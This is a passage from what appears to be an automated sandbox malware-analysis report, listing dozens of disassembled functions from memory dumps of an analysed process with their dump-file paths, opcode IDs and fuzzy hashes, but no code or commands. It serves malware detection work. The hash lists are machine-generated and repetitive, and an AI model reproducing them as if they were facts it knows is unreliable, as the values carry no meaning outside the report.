                                                                                                                                                                                  • Opcode Fuzzy Hash: c27c09efce7bfe9ab6df78fec05acc7c10de9bfaf105660331527dfbc3418eac
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A519E35A00909CFDB16DBA8D498BAD77E2BB89315F188479D1029F2D5CB34DC86CB52
                                                                                                                                                                                  Function 01501CA0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Te^q
                                                                                                                                                                                  • API String ID: 0-671973202
                                                                                                                                                                                  • Opcode ID: 2f4673b41eb573af1e718faf36ba69a34070eb9b6b0f465915d51bd6bcfe3f56
                                                                                                                                                                                  • Instruction ID: 5bd79792e5d3fbbe072f6f0700d4464dabd5bdb3678fe82d52eda680f01149be
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f4673b41eb573af1e718faf36ba69a34070eb9b6b0f465915d51bd6bcfe3f56
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC519F35A00909CFDB16DBA9D4987AD77E2BB88315F188479D1029F3D5CB34DC86CB52
                                                                                                                                                                                  Function 015032ED Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: sq
                                                                                                                                                                                  • API String ID: 0-1320738648
                                                                                                                                                                                  • Opcode ID: 613dd5c7fcc92bd841226e8a80fa978130ceff20c0caf589dc641dbf38a867e0
                                                                                                                                                                                  • Instruction ID: 1864b0a8d75a07ac3ce72d388fa0843761447bd72721f93effeb2976909ca851
                                                                                                                                                                                  • Opcode Fuzzy Hash: 613dd5c7fcc92bd841226e8a80fa978130ceff20c0caf589dc641dbf38a867e0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C41CF34704148CFDB66DBA8E858BAA77F2FB89314F1584A5E0059F3AACB75DC46CB10
                                                                                                                                                                                  Function 015033F1 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2643761a9fdcd2a0bf8ea90010e278b08be9caf57d6d2cee5ab30a90e8221eb4
                                                                                                                                                                                  • Instruction ID: 3fafe1d468b30a67c38229cd16c6ef024335e4b114c555436ab4df3850a59529
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2643761a9fdcd2a0bf8ea90010e278b08be9caf57d6d2cee5ab30a90e8221eb4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2541BF34B00108CFDB66DBA8E858BAA77F2FB89314F1544A5E1059F3EACB759C46CB10
                                                                                                                                                                                  Function 01501B10 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8e210cf8fc7117ae763c48b526e64a8042f6d943aabf51007150b5bbfa5f0e70
                                                                                                                                                                                  • Instruction ID: 74425c7f943d68692838a06316c26675091a545d0edc9abdbc04cf533ee0086e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e210cf8fc7117ae763c48b526e64a8042f6d943aabf51007150b5bbfa5f0e70
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31C6357006058FD726DB79E49867DB7E6FB85750F0484B6D40ACF2A9EB30DC068B41
                                                                                                                                                                                  Function 0150277D Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3507d540e4aa9b94979b06a24a6540b8d081918329ca98078d9c43e204928dec
                                                                                                                                                                                  • Instruction ID: 296d1639adb01cc6be4e6fbb16764699f3bc57e71942e6e1435a00e96c2aa053
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3507d540e4aa9b94979b06a24a6540b8d081918329ca98078d9c43e204928dec
                                                                                                                                                                                  • Instruction Fuzzy Hash: 163137B0D00249DFDB15CFA9C584AEEBFF5BF88300F248429E949AB250DB349A45CF91
                                                                                                                                                                                  Function 01501B60 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 86999d4334259bf4f9cad1d71d96cc486adb92538392e726a8a096cb0305cedd
                                                                                                                                                                                  • Instruction ID: d7ca8667167544604be8127952643ddde9471e055de47cd833b54b1b48f01e3b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 86999d4334259bf4f9cad1d71d96cc486adb92538392e726a8a096cb0305cedd
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA21E9317047454FD7179B6DD49867ABBA2FB86350F0584A7D405CF2AAEB24C8068B81
                                                                                                                                                                                  Function 0150AE57 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4347d688730d6b22eb4b977f594cbbdb101a0fb3b13817d253700fdcb7a5bc09
                                                                                                                                                                                  • Instruction ID: cd222f1e14530b1443221c6fa1f11af3e0c41089ec34ac9a423c2237b1495485
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4347d688730d6b22eb4b977f594cbbdb101a0fb3b13817d253700fdcb7a5bc09
                                                                                                                                                                                  • Instruction Fuzzy Hash: 133129B0D0020ADFCB05DFA9C4446AEBBF2FF89300F1484A9D415EB265EB35AA45CF50
                                                                                                                                                                                  Function 01502788 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a32f84454a2dbf734eecc7d81cc91b62c5ec1f1bea045b35e459aed00c6d4318
                                                                                                                                                                                  • Instruction ID: 2c21dbca199001aed7624e4198721fe493af4b3362088722c7a2095bc43f4840
                                                                                                                                                                                  • Opcode Fuzzy Hash: a32f84454a2dbf734eecc7d81cc91b62c5ec1f1bea045b35e459aed00c6d4318
                                                                                                                                                                                  • Instruction Fuzzy Hash: 313137B0D00248DFDB15CFAAC584ADEBFF5BF48300F248429E909AB250DB349945CF90
                                                                                                                                                                                  Function 0150AE68 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cd8f78b304b429ae8ebd403810186eb000d3f413a0187703ff893844f1d31aa6
                                                                                                                                                                                  • Instruction ID: a24f446d6f5245073b3a971c1f89b4d474af6852d6dcce8f7941b167e7cd4f75
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd8f78b304b429ae8ebd403810186eb000d3f413a0187703ff893844f1d31aa6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F3129B0D0020ADFCB05DFA9C4446AEBBF6FF89300F14D869D515AB265EB35AA44CF50
                                                                                                                                                                                  Function 0126D030 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3945940677.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_126d000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2ceda276d26abe533442af2d1a6f3000b8c88f58c9eb7f5c16c179b6f6b2e623
                                                                                                                                                                                  • Instruction ID: f6e2e56ddda582a6ee4421bbf744f512f3ae9f92accad13eddee33dac857d7fd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ceda276d26abe533442af2d1a6f3000b8c88f58c9eb7f5c16c179b6f6b2e623
                                                                                                                                                                                  • Instruction Fuzzy Hash: D221377161424CDFCB11DF58DAC4B27BF69FB84314F20C169D9490B286C376D486CBA2
                                                                                                                                                                                  Function 0150AA88 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d32fbc7a0396dcdee9c840b78d3f84481c0d3287fb2b977ff73f192abf171914
                                                                                                                                                                                  • Instruction ID: e54d8fed638ffb8283473f11a5955edf0dd18920e61e31e429ecd8df8c0904ec
                                                                                                                                                                                  • Opcode Fuzzy Hash: d32fbc7a0396dcdee9c840b78d3f84481c0d3287fb2b977ff73f192abf171914
                                                                                                                                                                                  • Instruction Fuzzy Hash: 69213970905248DFDB01EFA9D6487AEBFF5FB49304F0085AAE045AB2C1DBB44A88DB41
                                                                                                                                                                                  Function 075E25D1 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b7cb22c6a345dde7311051418c31d1e150a85a3de93d8bb9f74dd294c52ecde3
                                                                                                                                                                                  • Instruction ID: 76b0569b786b1c13f10f60d879e982d53d17a09d5051e4f33e79b9fe8001cde1
                                                                                                                                                                                  • Opcode Fuzzy Hash: b7cb22c6a345dde7311051418c31d1e150a85a3de93d8bb9f74dd294c52ecde3
                                                                                                                                                                                  • Instruction Fuzzy Hash: F531A274B052298FDBA4DF28CD84A99B7F1BB0A304F1084E5D90DA7B51DB349E85DF42
                                                                                                                                                                                  Function 0150AA98 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a4ab564a1a09b5d36708e345ee0eb42494ab862e62c7e20f1f62d4af162af45a
                                                                                                                                                                                  • Instruction ID: 45eb49e62372b6b2e5149e53e32f3f13fe95dea5608a0bab523e796ad53c5708
                                                                                                                                                                                  • Opcode Fuzzy Hash: a4ab564a1a09b5d36708e345ee0eb42494ab862e62c7e20f1f62d4af162af45a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83213870D05208DFDB01EFA9D2487ADBBF5FB49305F1085A9D00AAB2C1EBB44A88DB01
                                                                                                                                                                                  Function 0150A9D5 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2f70ab90e45d01f425e0280bf9e8c84362dd8f97142c492a7f8e152fec66b1da
                                                                                                                                                                                  • Instruction ID: d34e3becc812ba67253710fcf2daf9d240131734807a029f8271030de0158257
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f70ab90e45d01f425e0280bf9e8c84362dd8f97142c492a7f8e152fec66b1da
                                                                                                                                                                                  • Instruction Fuzzy Hash: F711C2317087449FD71ADB68D914B657BB2BF8A304F1944EAE4098FAE2C6B19882C751
                                                                                                                                                                                  Function 01501A30 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 53cb74c0e593b21937a9a422bba8d846e2f92a08b2fa1e8b14a52702e9cce8e8
                                                                                                                                                                                  • Instruction ID: f8b7a6ed8b841ec4eb50b3a60d5331d9e968ef2d1e513d47dd431ac29c934b80
                                                                                                                                                                                  • Opcode Fuzzy Hash: 53cb74c0e593b21937a9a422bba8d846e2f92a08b2fa1e8b14a52702e9cce8e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E11E6357406448FC7179768D45077E37E2FBC1350F18846BD40A8F3A9DAB4CC868B82
                                                                                                                                                                                  Function 0126D02B Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3945940677.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_126d000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                                                                                                                                  • Instruction ID: c5a29e79361aa137e82884c57e32c409a1ae25a5a90513662af5b80853d082bc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11E276504288CFDB12CF54D9C4B16BF71FB84314F24C2AADD490B696C33AD45ACBA2
                                                                                                                                                                                  Function 01501A40 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a81197bc9bfbbd6245e1d9eafe3f00387ab142489b6bf9673130997189e88f98
                                                                                                                                                                                  • Instruction ID: f02081b274b746af01d7d822183887d67489d9adb163c96daa29f8f34847b6aa
                                                                                                                                                                                  • Opcode Fuzzy Hash: a81197bc9bfbbd6245e1d9eafe3f00387ab142489b6bf9673130997189e88f98
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC118B357409058FD717ABA9D49073A32D6FBC0754F18847AD81A8F3A8DAB4DC868BD2
                                                                                                                                                                                  Function 0125D76D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3945804780.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_125d000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 30e5d9cc64fac041c57608da47555f033012c1fb2693dd5a67fdaaecc3c82b95
                                                                                                                                                                                  • Instruction ID: aa43992c442527f5565d73222f18e83bf146c831af7d5c638c3ed2a1b179fcef
                                                                                                                                                                                  • Opcode Fuzzy Hash: 30e5d9cc64fac041c57608da47555f033012c1fb2693dd5a67fdaaecc3c82b95
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A0149310183889AF7548B69CDC4B67FFD8EF41324F08C42AEE094A287C378D840CA72
                                                                                                                                                                                  Function 075E83F9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0f04cb230295d490303b55eb6d2b16e29027804b069883cbc2e92202c6ab0f2a
                                                                                                                                                                                  • Instruction ID: a20f032e21a9ba0d71876acb045c520eb126c76f18cab682c3d4298f41930c7c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f04cb230295d490303b55eb6d2b16e29027804b069883cbc2e92202c6ab0f2a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4111CB8A112188FDB94EF14D9A4AAA77B6FB88300F1040D5D649E7384CB319EC2CF50
                                                                                                                                                                                  Function 0150AA18 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2c87cf27e423f6de8e2faf6877787d55ddde77fd1fa810991c79ad6dc3ec5d6f
                                                                                                                                                                                  • Instruction ID: 3bb18789c3d7eb142c067d8be483f0e27ec4917929b1c6a8e3342beb75762407
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c87cf27e423f6de8e2faf6877787d55ddde77fd1fa810991c79ad6dc3ec5d6f
                                                                                                                                                                                  • Instruction Fuzzy Hash: E9F02B317043449FD72A8754DE11B6137B3BB45300F1940F6F5058FAE6C6B098828791
                                                                                                                                                                                  Function 0125D76C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3945804780.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_125d000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fcfc2ca2e7d23734a8c12cc3547a7b9f0bc7dcd1404d4c2b0de6641f75991d49
                                                                                                                                                                                  • Instruction ID: 9217135c926dfcd66142b64c5d77af605ea537adfd0de4c788db095eec69c282
                                                                                                                                                                                  • Opcode Fuzzy Hash: fcfc2ca2e7d23734a8c12cc3547a7b9f0bc7dcd1404d4c2b0de6641f75991d49
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53F062714093889EE7158A1AD8C4B67FFA8EB41724F18C45AEE484A296C279A844CA71
                                                                                                                                                                                  Function 075E7452 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 43dc13662b6ba70487149eb0a76dba21fa9c6d3e8282a670ba70c32544be75dd
                                                                                                                                                                                  • Instruction ID: 7f81fc24943fc40fd051f7b3ab99ebd10d5ec9811fc9c9cb41fbf7cdc9c0322a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43dc13662b6ba70487149eb0a76dba21fa9c6d3e8282a670ba70c32544be75dd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B11A878A111198FEB58EF28C994AAAB7F1FB48300F1081E5D90DA7384DE309E81CF80
                                                                                                                                                                                  Function 01500900 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1432596969ae80eee44f8deb121034d72ebb24b2f0ad8f9c4172318b3e18a3b7
                                                                                                                                                                                  • Instruction ID: d4afc5495d03ae7a30fd83bfe85898544f0d9d2f223f578a9373625eb337b6bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1432596969ae80eee44f8deb121034d72ebb24b2f0ad8f9c4172318b3e18a3b7
                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF04F249097C4DFD3175F6894146A97FB5BF47250F0D44E3E485CB6E3D2288945CB92
                                                                                                                                                                                  Function 075FFF68 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.4122947225.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_75e0000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3ab81eff2422f1fd77c3a8a30d659772050f458c8e9ea7d58b86ef7777a16330
                                                                                                                                                                                  • Instruction ID: 45896f9781fd133576f00da0a25edc3cbe71c8a199b4e44c69af84fc17772f95
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ab81eff2422f1fd77c3a8a30d659772050f458c8e9ea7d58b86ef7777a16330
                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0EC7190420ADBCF01DF99D8009EEBB75FF89324F00C519EA5867251D731A5A6DB90
                                                                                                                                                                                  Function 0150AA28 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 335fc34199c2ca170b8b6d2ecc1d15be96b68f4787b0bf41a6903f67fe92fb24
                                                                                                                                                                                  • Instruction ID: 5a80b0419a7b6f222cde9a14791429255d0ef2d69a2d38e4c73f9ce2d865119a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 335fc34199c2ca170b8b6d2ecc1d15be96b68f4787b0bf41a6903f67fe92fb24
                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F0A0303403089FE729CA59DE01B2673E3BB88704F1880B5E2098F6E4CAF0A8828684
                                                                                                                                                                                  Function 01500860 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000C.00000002.3946737260.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1500000_3E6C.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
